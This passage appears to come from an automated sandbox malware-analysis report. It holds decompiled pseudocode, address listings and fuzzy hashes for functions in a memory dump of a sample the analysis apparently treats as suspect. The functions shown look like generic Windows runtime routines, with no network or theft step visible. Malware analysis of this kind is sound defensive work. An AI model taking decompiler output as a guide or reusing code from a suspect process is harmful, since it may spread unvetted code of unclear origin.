									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                    0x0167ef4b
                    0x0167ef4d
                    0x0167ef57
                    0x0167f0bd
                    0x0167f0c2
                    0x0167f0d2
                    0x0167f0d2
                    0x0167f0c2
                    0x0167ef5d
                    0x0167ef5f
                    0x0167ef67
                    0x0167ef6a
                    0x0167ef6d
                    0x0167ef74
                    0x0167ef7f
                    0x0167ef82
                    0x0167ef82
                    0x0167ef86
                    0x0167ef88
                    0x0167ef8c
                    0x0167ef8f
                    0x0167ef8f
                    0x0167ef8f
                    0x00000000
                    0x0167ef91
                    0x0167ef93
                    0x0167efc4
                    0x0167efc4
                    0x0167efc4
                    0x0167efca
                    0x0167efd0
                    0x0167f0a6
                    0x00000000
                    0x00000000
                    0x0167f0af
                    0x016cbb06
                    0x016cbb0a
                    0x0167f0b5
                    0x0167f0b5
                    0x0167f0b5
                    0x0167f0b5
                    0x00000000
                    0x0167efd6
                    0x0167efd9
                    0x0167f0de
                    0x0167f0e2
                    0x0167efdf
                    0x0167efdf
                    0x0167efdf
                    0x0167efe5
                    0x016cbafc
                    0x016cbafc
                    0x0167efe5
                    0x0167efeb
                    0x0167efed
                    0x0167f00f
                    0x0167f011
                    0x0167f01a
                    0x0167f01d
                    0x0167f021
                    0x0167f028
                    0x0167f029
                    0x0167f029
                    0x0167f02c
                    0x00000000
                    0x0167f02c
                    0x0167eff3
                    0x0167eff9
                    0x0167f0ea
                    0x0167f0ed
                    0x0167f0ef
                    0x00000000
                    0x0167f0ef
                    0x0167f003
                    0x016cbb12
                    0x0167f045
                    0x0167f049
                    0x0167f051
                    0x0167f09e
                    0x0167f0a0
                    0x0167f0a0
                    0x0167f09e
                    0x0167f053
                    0x0167f064
                    0x0167f064
                    0x0167f06b
                    0x016cbb1a
                    0x016cbb1a
                    0x0167f071
                    0x0167f071
                    0x0167f07d
                    0x0167f082
                    0x0167f08f
                    0x0167f08f
                    0x0167f009
                    0x0167f00d
                    0x00000000
                    0x0167f00d
                    0x0167efd0
                    0x0167ef97
                    0x0167efa5
                    0x0167efaa
                    0x00000000
                    0x0167efac
                    0x0167efac
                    0x0167efac
                    0x00000000
                    0x0167efb2
                    0x0167f036
                    0x0167f03a
                    0x0167f040
                    0x0167f090
                    0x00000000
                    0x0167f092
                    0x0167f042
                    0x00000000
                    0x0167f042
                    0x0167efb7
                    0x0167efb9
                    0x0167efbc
                    0x0167efb0
                    0x0167efb0
                    0x00000000
                    0x0167efbe
                    0x0167efbe
                    0x0167efc1
                    0x00000000
                    0x0167efc1
                    0x0167efbc
                    0x0167efaa
                    0x0167ef91

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                    • Instruction ID: 130d658315be215c53f89b24965b24a17a9a4c60a91ddaf1b573ec44d8898e6f
                    • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                    • Instruction Fuzzy Hash: DA510430E04245DFEB26CB6CC9E0BAEBBB1AF05314F1881E8C56553382C77AA989C751
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0173740D Relevance: .1, Instructions: 141COMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E0173740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E016BD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E016AF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L01684620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L01684620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E016AF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L01684620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                    0x0173740d
                    0x0173740d
                    0x01737412
                    0x01737413
                    0x01737416
                    0x01737418
                    0x0173741c
                    0x0173741f
                    0x01737422
                    0x01737422
                    0x01737428
                    0x0173742a
                    0x0173742a
                    0x01737451
                    0x01737432
                    0x0173744f
                    0x0173744f
                    0x00000000
                    0x01737434
                    0x01737438
                    0x01737443
                    0x01737517
                    0x01737517
                    0x0173751a
                    0x01737535
                    0x01737520
                    0x01737527
                    0x0173752c
                    0x01737531
                    0x01737533
                    0x00000000
                    0x01737533
                    0x00000000
                    0x01737531
                    0x0173754b
                    0x0173754f
                    0x0173755c
                    0x0173755c
                    0x0173755f
                    0x01737560
                    0x01737561
                    0x01737562
                    0x01737563
                    0x01737568
                    0x0173756a
                    0x0173756c
                    0x0173756d
                    0x0173756d
                    0x0173756f
                    0x01737572
                    0x01737574
                    0x01737577
                    0x0173757c
                    0x0173757f
                    0x00000000
                    0x01737551
                    0x01737551
                    0x01737551
                    0x01737553
                    0x01737553
                    0x01737449
                    0x01737449
                    0x0173744c
                    0x0173744c
                    0x00000000
                    0x0173744c
                    0x01737443
                    0x0173750e
                    0x01737514
                    0x01737514
                    0x01737455
                    0x01737469
                    0x0173746d
                    0x00000000
                    0x01737473
                    0x01737473
                    0x01737476
                    0x01737480
                    0x01737484
                    0x0173748e
                    0x01737493
                    0x01737493
                    0x01737496
                    0x01737499
                    0x017374a1
                    0x017374b1
                    0x017374b5
                    0x00000000
                    0x017374bb
                    0x017374c1
                    0x017374c1
                    0x017374c4
                    0x017374c5
                    0x017374c6
                    0x017374c7
                    0x017374c8
                    0x017374cd
                    0x00000000
                    0x017374d3
                    0x017374d3
                    0x017374d6
                    0x017374d8
                    0x017374db
                    0x017374dd
                    0x017374e0
                    0x017374e7
                    0x017374ee
                    0x017374ee
                    0x017374f4
                    0x017374f9
                    0x00000000
                    0x017374fb
                    0x017374fb
                    0x017374fd
                    0x01737500
                    0x01737503
                    0x01737505
                    0x01737505
                    0x017374f9
                    0x00000000
                    0x017374cd
                    0x017374b5
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                    • Instruction ID: d9c0ba8b597314426c5b9b49e332b4ba201e3986350e7fd049c7b4252fb333d1
                    • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                    • Instruction Fuzzy Hash: C5518FB1600646DFDB1ACF18C880A55FBF5FF85304F14C1AAE9089F252E771E945CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01692990 Relevance: .1, Instructions: 133COMMON
                    Download Yara Rule
                    C-Code - Quality: 97%
                    			E01692990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x173ff00);
				E016BD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x1641664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E016AE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x1641668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E016E51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x164166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E01692AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E01676600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E01692C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E0167EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E01692AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E01692C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E01692ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E016BD0D1(_t62);
				goto L28;
			}





















                    0x01692990
                    0x01692992
                    0x01692997
                    0x016929a3
                    0x016929a6
                    0x016929ab
                    0x016929ad
                    0x016929b2
                    0x016d5c80
                    0x016929b8
                    0x016929b8
                    0x016929bb
                    0x016929c0
                    0x016929c5
                    0x016929c6
                    0x016929c6
                    0x016929cb
                    0x00000000
                    0x00000000
                    0x016929cd
                    0x016929d0
                    0x016929d9
                    0x016929db
                    0x016929dd
                    0x01692a7f
                    0x01692a84
                    0x01692a87
                    0x01692a89
                    0x016d5ca1
                    0x016d5ca3
                    0x00000000
                    0x01692a8f
                    0x01692a8f
                    0x00000000
                    0x01692a8f
                    0x00000000
                    0x016929e3
                    0x016929e3
                    0x016929e3
                    0x00000000
                    0x016929e3
                    0x016929dd
                    0x00000000
                    0x016929db
                    0x016929e6
                    0x016929e9
                    0x016929eb
                    0x016929ed
                    0x016929f3
                    0x016929f5
                    0x016929f8
                    0x016929fa
                    0x01692a97
                    0x01692a9a
                    0x01692a9d
                    0x01692add
                    0x00000000
                    0x01692a9f
                    0x01692aa2
                    0x01692aa5
                    0x01692aa8
                    0x01692aab
                    0x016d5cab
                    0x016d5caf
                    0x016d5cc5
                    0x016d5cda
                    0x016d5cdc
                    0x016d5cdf
                    0x016d5ce5
                    0x00000000
                    0x016d5ceb
                    0x016d5ced
                    0x016d5cee
                    0x00000000
                    0x016d5cee
                    0x016d5cb1
                    0x016d5cb4
                    0x016d5cb9
                    0x016d5cbb
                    0x00000000
                    0x016d5cbd
                    0x016d5cbd
                    0x00000000
                    0x016d5cbd
                    0x016d5cbb
                    0x01692ab1
                    0x01692ab1
                    0x01692ac4
                    0x01692ac6
                    0x01692ac6
                    0x00000000
                    0x01692ac6
                    0x01692aab
                    0x00000000
                    0x01692a00
                    0x01692a09
                    0x01692a0e
                    0x01692a21
                    0x01692a24
                    0x01692a35
                    0x01692a3a
                    0x01692a3d
                    0x01692a42
                    0x01692a59
                    0x01692a59
                    0x01692a5c
                    0x01692a5f
                    0x01692a5f
                    0x016929fa
                    0x016929f3
                    0x01692a64
                    0x01692a64
                    0x01692a6b
                    0x01692a6b
                    0x01692a6d
                    0x01692a72
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 494bd3ab38b8e450d0213e061c6f3449cb1a67c16bbdbe208a2a24ed065245eb
                    • Instruction ID: 0be96fc1bcabcfd73733a368521216f7852cb59ed00d59e1895c3496780fea75
                    • Opcode Fuzzy Hash: 494bd3ab38b8e450d0213e061c6f3449cb1a67c16bbdbe208a2a24ed065245eb
                    • Instruction Fuzzy Hash: 39514A7290021AEFDF25DF59CC90AEEBBBABF58350F008159ED05AB320C3359952CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01694BAD Relevance: .1, Instructions: 131COMMON
                    Download Yara Rule
                    C-Code - Quality: 85%
                    			E01694BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x175d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0166CC50(_t86);
					L11:
					return E016AB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1758504
				E01682280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E016AFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E016AB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L01684620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0166CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1758504
								E0167FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E01694F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                    0x01694bad
                    0x01694bbf
                    0x01694bc2
                    0x01694bc6
                    0x01694bcd
                    0x01694bd9
                    0x016d67fe
                    0x016d6800
                    0x01694ccc
                    0x01694ccd
                    0x01694cb7
                    0x01694cc9
                    0x01694cc9
                    0x01694bdf
                    0x01694be5
                    0x00000000
                    0x00000000
                    0x01694beb
                    0x01694bef
                    0x00000000
                    0x00000000
                    0x01694bf5
                    0x01694bf9
                    0x01694c06
                    0x01694c0b
                    0x01694c17
                    0x01694c1c
                    0x01694c1f
                    0x01694c25
                    0x01694c33
                    0x01694c3d
                    0x01694c40
                    0x01694c43
                    0x01694c47
                    0x01694c4d
                    0x01694c53
                    0x01694c54
                    0x01694c55
                    0x01694c56
                    0x01694c5b
                    0x01694c5c
                    0x01694c63
                    0x01694c6b
                    0x00000000
                    0x00000000
                    0x016d6776
                    0x016d6784
                    0x016d6784
                    0x016d679f
                    0x016d67a7
                    0x016d67af
                    0x016d67ce
                    0x00000000
                    0x016d67b1
                    0x016d67b7
                    0x016d67b8
                    0x016d67c1
                    0x016d67d3
                    0x016d67d9
                    0x016d67dd
                    0x01694c94
                    0x01694c94
                    0x01694c98
                    0x01694c9c
                    0x01694ca3
                    0x016d67f4
                    0x016d67f4
                    0x01694cb5
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x01694cb5
                    0x01694c79
                    0x01694c7e
                    0x01694c89
                    0x01694c8b
                    0x01694c8f
                    0x01694c8f
                    0x00000000
                    0x01694c89
                    0x016d67c3
                    0x00000000
                    0x016d67c3
                    0x016d67af
                    0x01694c73
                    0x00000000
                    0x00000000
                    0x00000000

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 726a909bbb252e24a462a23bf07a88ad90e8b5fa4244dd3e5e3deba68d0b59d4
                    • Instruction ID: d17c49c45cc187f3021068fcb8b9948eb9bab66543b2f1f55ade7af7bb7010ef
                    • Opcode Fuzzy Hash: 726a909bbb252e24a462a23bf07a88ad90e8b5fa4244dd3e5e3deba68d0b59d4
                    • Instruction Fuzzy Hash: 71418035E00269DFDF21EF68CD40BEA77B9AF45710F0104A9E908AB341EB749E85CB95
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01694D3B Relevance: .1, Instructions: 131COMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E01694D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x175d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E016AFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1757bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E016AB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01684620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0166CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E016AB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E016AF380(_t67 + 0xc, 0x1645138, 0x10) == 0) {
								 *0x17560d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E01694F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E01694E70(0x17586b0, 0x1695690, 0, 0) != 0) {
					_t46 = E0166CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                    0x01694d3b
                    0x01694d4d
                    0x01694d53
                    0x01694d58
                    0x01694d65
                    0x01694d6c
                    0x01694d71
                    0x01694d77
                    0x01694d7f
                    0x01694d8c
                    0x01694d8e
                    0x01694dad
                    0x01694db0
                    0x01694db7
                    0x01694db8
                    0x01694db9
                    0x01694dba
                    0x01694dbb
                    0x01694dc1
                    0x01694dc8
                    0x01694dcc
                    0x01694dd5
                    0x01694dde
                    0x01694ddf
                    0x01694de0
                    0x01694de1
                    0x01694de6
                    0x01694de7
                    0x01694de9
                    0x01694df3
                    0x00000000
                    0x00000000
                    0x016d6c7c
                    0x016d6c8a
                    0x016d6c8a
                    0x016d6c9d
                    0x016d6ca7
                    0x016d6cac
                    0x016d6cb2
                    0x016d6cb9
                    0x00000000
                    0x016d6cbf
                    0x016d6cbf
                    0x00000000
                    0x016d6cbf
                    0x016d6cb9
                    0x01694dfb
                    0x016d6ccf
                    0x016d6cd3
                    0x01694e32
                    0x01694e39
                    0x016d6ce0
                    0x016d6cf2
                    0x016d6cf2
                    0x016d6ce0
                    0x01694e3f
                    0x01694e41
                    0x01694e51
                    0x01694e51
                    0x01694e03
                    0x01694e03
                    0x01694e09
                    0x01694e0f
                    0x01694e57
                    0x00000000
                    0x00000000
                    0x01694e1b
                    0x01694e30
                    0x01694e5b
                    0x01694e5b
                    0x00000000
                    0x01694e30
                    0x01694e11
                    0x01694e11
                    0x01694e16
                    0x00000000
                    0x01694e16
                    0x01694e01
                    0x00000000
                    0x01694e01
                    0x01694da5
                    0x016d6c6b
                    0x00000000
                    0x01694dab
                    0x01694dab
                    0x00000000
                    0x01694dab

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 77413d832b2f15103956f41bf9db9c17e43fe7a06c5fbad53ee2d0a9230cd0c6
                    • Instruction ID: 2902a21dc314f242d1504635184c156440c2287e23bc1d627e8ad8c5fb4002dd
                    • Opcode Fuzzy Hash: 77413d832b2f15103956f41bf9db9c17e43fe7a06c5fbad53ee2d0a9230cd0c6
